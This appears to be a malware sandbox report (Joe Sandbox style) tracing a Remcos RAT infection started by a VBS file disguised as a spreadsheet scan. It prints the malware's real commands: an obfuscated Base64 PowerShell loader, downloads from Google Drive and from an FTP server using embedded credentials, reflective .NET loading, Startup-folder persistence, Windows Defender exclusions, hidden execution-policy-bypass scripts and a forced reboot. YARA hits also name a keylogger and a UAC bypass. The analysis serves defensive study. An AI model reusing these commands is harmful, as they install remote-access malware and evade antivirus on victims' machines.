'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'ZQBU' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgBw' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBm' + [char]65 + 'Hk' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'GU' + [char]65 + 'aQBs' + [char]65 + 'EM' + [char]65 + 'YgBl' + [char]65 + 'Fc' + [char]65 + 'LgB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'g' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBP' + [char]65 + 'C0' + [char]65 + 'dwBl' + [char]65 + 'E4' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bw' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBm' + [char]65 + 'Hk' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'H0' + [char]65 + 'Ow' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'JwB0' + [char]65 + 'E8' + [char]65 + 'T' + [char]65 + 'Bj' + [char]65 + 'F8' + [char]65 + 'SwBh' + [char]65 + 'DM' + [char]65 + 'WgBm' + [char]65 + 'G8' + [char]65 + 'W' + [char]65 + '' + [char]65 + 'y' + [char]65 + 'Eo' + [char]65 + 'SgBy' + [char]65 + 'FY' + [char]65 + 'a' + [char]65 + 'Bt' + [char]65 + 'FY' + [char]65 + 'OQBj' + [char]65 + 'G0' + [char]65 + 'OQBY' + [char]65 + 'HM' + [char]65 + 'dQBY' + [char]65 + 'G0' + [char]65 + 'ag' + [char]65 + 'x' + [char]65 + 'Gc' + [char]65 + 'MQ' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'Ek' + [char]65 + 'bwBx' + [char]65 + 'GE' + [char]65 + 'Rg' + [char]65 + 'k' + [char]65 + 'Cg' + [char]65 + 'I' + [char]65 + '' + [char]65 + '9' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'SQBv' + [char]65 + 'HE' + [char]65 + 'YQBG' + [char]65 + 'CQ' + [char]65 + 'ew' + [char]65 + 'g' + [char]65 + 'GU' + [char]65 + 'cwBs' + [char]65 + 'GU' + [char]65 + 'fQ' + [char]65 + '7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'DI' + [char]65 + 'N' + [char]65 + 'B1' + [char]65 + 'Fg' + [char]65 + 'SgBU' + [char]65 + 'HE' + [char]65 + 'YQBt' + [char]65 + 'Gc' + [char]65 + 'eQBN' + [char]65 + 'HQ' + [char]65 + 'RgB6' + [char]65 + 'GE' + [char]65 + 'awBQ' + [char]65 + 'FI' + [char]65 + 'MQBx' + [char]65 + 'F8' + [char]65 + 'SQB2' + [char]65 + 'Ec' + [char]65 + 'aQBY' + [char]65 + 'E4' + [char]65 + 'Z' + [char]65 + 'Bx' + [char]65 + 'GE' + [char]65 + 'Tg' + [char]65 + 'x' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'r' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'SQBv' + [char]65 + 'HE' + [char]65 + 'YQBG' + [char]65 + 'CQ' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'BJ' + [char]65 + 'G8' + [char]65 + 'cQBh' + [char]65 + 'EY' + [char]65 + 'J' + [char]65 + 'B7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'HI' + [char]65 + 'bQBF' + [char]65 + 'Hc' + [char]65 + 'ag' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'aQ' + [char]65 + '7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'DQ' + [char]65 + 'Ng' + [char]65 + 'n' + [char]65 + 'Cg' + [char]65 + 'cwBu' + [char]65 + 'Gk' + [char]65 + 'YQB0' + [char]65 + 'G4' + [char]65 + 'bwBD' + [char]65 + 'C4' + [char]65 + 'RQBS' + [char]65 + 'FU' + [char]65 + 'V' + [char]65 + 'BD' + [char]65 + 'EU' + [char]65 + 'V' + [char]65 + 'BJ' + [char]65 + 'Eg' + [char]65 + 'QwBS' + [char]65 + 'EE' + [char]65 + 'XwBS' + [char]65 + 'E8' + [char]65 + 'UwBT' + [char]65 + 'EU' + [char]65 + 'QwBP' + [char]65 + 'FI' + [char]65 + 'U' + [char]65 + '' + [char]65 + '6' + [char]65 + 'HY' + [char]65 + 'bgBl' + [char]65 + 'CQ' + [char]65 + 'I' + [char]65 + '' + [char]65 + '9' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'cgBt' + [char]65 + 'EU' + [char]65 + 'dwBq' + [char]65 + 'CQ' + [char]65 + 'Ow' + [char]65 + 'n' + [char]65 + 'D0' + [char]65 + 'Z' + [char]65 + 'Bp' + [char]65 + 'CY' + [char]65 + 'Z' + [char]65 + 'Bh' + [char]65 + 'G8' + [char]65 + 'b' + [char]65 + 'Bu' + [char]65 + 'Hc' + [char]65 + 'bwBk' + [char]65 + 'D0' + [char]65 + 'd' + [char]65 + 'By' + [char]65 + 'G8' + [char]65 + 'c' + [char]65 + 'B4' + [char]65 + 'GU' + [char]65 + 'PwBj' + [char]65 + 'HU' + [char]65 + 'LwBt' + [char]65 + 'G8' + [char]65 + 'Yw' + [char]65 + 'u' + [char]65 + 'GU' + [char]65 + 'b' + [char]65 + 'Bn' + [char]65 + 'G8' + [char]65 + 'bwBn' + [char]65 + 'C4' + [char]65 + 'ZQB2' + [char]65 + 'Gk' + [char]65 + 'cgBk' + [char]65 + 'C8' + [char]65 + 'Lw' + [char]65 + '6' + [char]65 + 'HM' + [char]65 + 'c' + [char]65 + 'B0' + [char]65 + 'HQ' + [char]65 + 'a' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Ek' + [char]65 + 'bwBx' + [char]65 + 'GE' + [char]65 + 'Rg' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Cc' + [char]65 + 'dQBz' + [char]65 + 'G0' + [char]65 + 'LgBu' + [char]65 + 'Gk' + [char]65 + 'dwBw' + [char]65 + 'FU' + [char]65 + 'X' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'FQ' + [char]65 + 'cgBI' + [char]65 + 'FY' + [char]65 + 'dQ' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Gw' + [char]65 + 'ZQBk' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'o' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'Bh' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'c' + [char]65 + 'Bt' + [char]65 + 'GU' + [char]65 + 'V' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + '6' + [char]65 + 'Do' + [char]65 + 'XQBo' + [char]65 + 'HQ' + [char]65 + 'YQBQ' + [char]65 + 'C4' + [char]65 + 'TwBJ' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'BU' + [char]65 + 'HI' + [char]65 + 'S' + [char]65 + 'BW' + [char]65 + 'HU' + [char]65 + 'J' + [char]65 + 'B7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ew' + [char]65 + 'QQBy' + [char]65 + 'Hc' + [char]65 + 'Sg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'aQ' + [char]65 + '7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'y' + [char]65 + 'Cg' + [char]65 + 'cwBs' + [char]65 + 'GE' + [char]65 + 'dQBx' + [char]65 + 'EU' + [char]65 + 'LgBy' + [char]65 + 'G8' + [char]65 + 'agBh' + [char]65 + 'E0' + [char]65 + 'LgBu' + [char]65 + 'G8' + [char]65 + 'aQBz' + [char]65 + 'HI' + [char]65 + 'ZQBW' + [char]65 + 'C4' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Ew' + [char]65 + 'QQBy' + [char]65 + 'Hc' + [char]65 + 'Sg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Ow' + [char]65 + '=';$nvcbv = $qKKzc.replace('???' , 'A') ;$acwwn = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nvcbv ) ); $acwwn = $acwwn[-1..-$acwwn.Length] -join '';$acwwn = $acwwn.replace('%XRqhI%','C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs');powershell $acwwn
                                Imagebase:0x7ff6e3d50000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:3
                                Start time:03:28:03
                                Start date:03/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff66e660000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:4
                                Start time:03:28:06
                                Start date:03/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};"
                                Imagebase:0x7ff6e3d50000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:5
                                Start time:03:28:12
                                Start date:03/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
                                Imagebase:0x7ff6e3d50000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:6
                                Start time:03:28:12
                                Start date:03/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
                                Imagebase:0x7ff6e3d50000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000006.00000002.2273102577.000001C100222000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:7
                                Start time:03:28:12
                                Start date:03/10/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\"
                                Imagebase:0x7ff67dc30000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:8
                                Start time:03:28:13
                                Start date:03/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
                                Imagebase:0x7ff6e3d50000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:9
                                Start time:03:28:16
                                Start date:03/10/2024
                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Imagebase:0x7ff717f30000
                                File size:496'640 bytes
                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                Has elevated privileges:true
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:13
                                Start time:03:28:21
                                Start date:03/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1"
                                Imagebase:0x7ff6e3d50000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.2594598048.000001EB5D360000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2594598048.000001EB5D360000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.2594598048.000001EB5D360000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.2594598048.000001EB5D360000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:14
                                Start time:03:28:21
                                Start date:03/10/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:cmd.exe /c del "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs"
                                Imagebase:0x7ff67dc30000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:15
                                Start time:03:28:23
                                Start date:03/10/2024
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Imagebase:0xbc0000
                                File size:65'440 bytes
                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.3436475205.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                Has exited:false

                                General

                                Target ID:16
                                Start time:03:28:24
                                Start date:03/10/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                                Imagebase:0x7ff67dc30000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:17
                                Start time:03:28:24
                                Start date:03/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff66e660000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:18
                                Start time:03:28:24
                                Start date:03/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                                Imagebase:0x7ff6e3d50000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000012.00000002.2661640004.0000019971901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.2661640004.0000019971901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000012.00000002.2661640004.0000019971901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000012.00000002.2661640004.0000019971901000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                Has exited:true

                                General

                                Target ID:19
                                Start time:03:28:24
                                Start date:03/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff66e660000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:20
                                Start time:03:28:27
                                Start date:03/10/2024
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Imagebase:0x8d0000
                                File size:65'440 bytes
                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                Has exited:true

                                General

                                Target ID:21
                                Start time:03:28:32
                                Start date:03/10/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                                Imagebase:0x7ff67dc30000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:22
                                Start time:03:28:32
                                Start date:03/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff66e660000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:23
                                Start time:03:28:32
                                Start date:03/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                                Imagebase:0x7ff6e3d50000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000017.00000002.2806942257.0000023E13C40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.2806942257.0000023E13C40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000017.00000002.2806942257.0000023E13C40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000017.00000002.2806942257.0000023E13C40000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                Has exited:true

                                General

                                Target ID:24
                                Start time:03:28:32
                                Start date:03/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff66e660000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:25
                                Start time:03:28:34
                                Start date:03/10/2024
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Imagebase:0x90000
                                File size:65'440 bytes
                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:26
                                Start time:03:28:34
                                Start date:03/10/2024
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Imagebase:0x7ff6ae840000
                                File size:65'440 bytes
                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Executed Functions

                                  Function 00007FFD347B0000 Relevance: 3.6, Strings: 2, Instructions: 1073COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.3399547003.00007FFD347B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd347b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 7/_H$:/_H
                                  • API String ID: 0-1736163573
                                  • Opcode ID: ca8d4c961a0b742256b1e1f55ca1e5be852dde54363ac0f626423b8bdf9e3ba7
                                  • Instruction ID: 24bfe5767e081480b8ad4b463188bf64966ac7668702536a86e09f7312ca3032
                                  • Opcode Fuzzy Hash: ca8d4c961a0b742256b1e1f55ca1e5be852dde54363ac0f626423b8bdf9e3ba7
                                  • Instruction Fuzzy Hash: 2C72C571A0DD9D8FDB95DF0CC894AA5B7E1FFAA310B5486E6C10DC7255DA38E881CB80
                                  Function 00007FFD345A5A75 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.3388274798.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
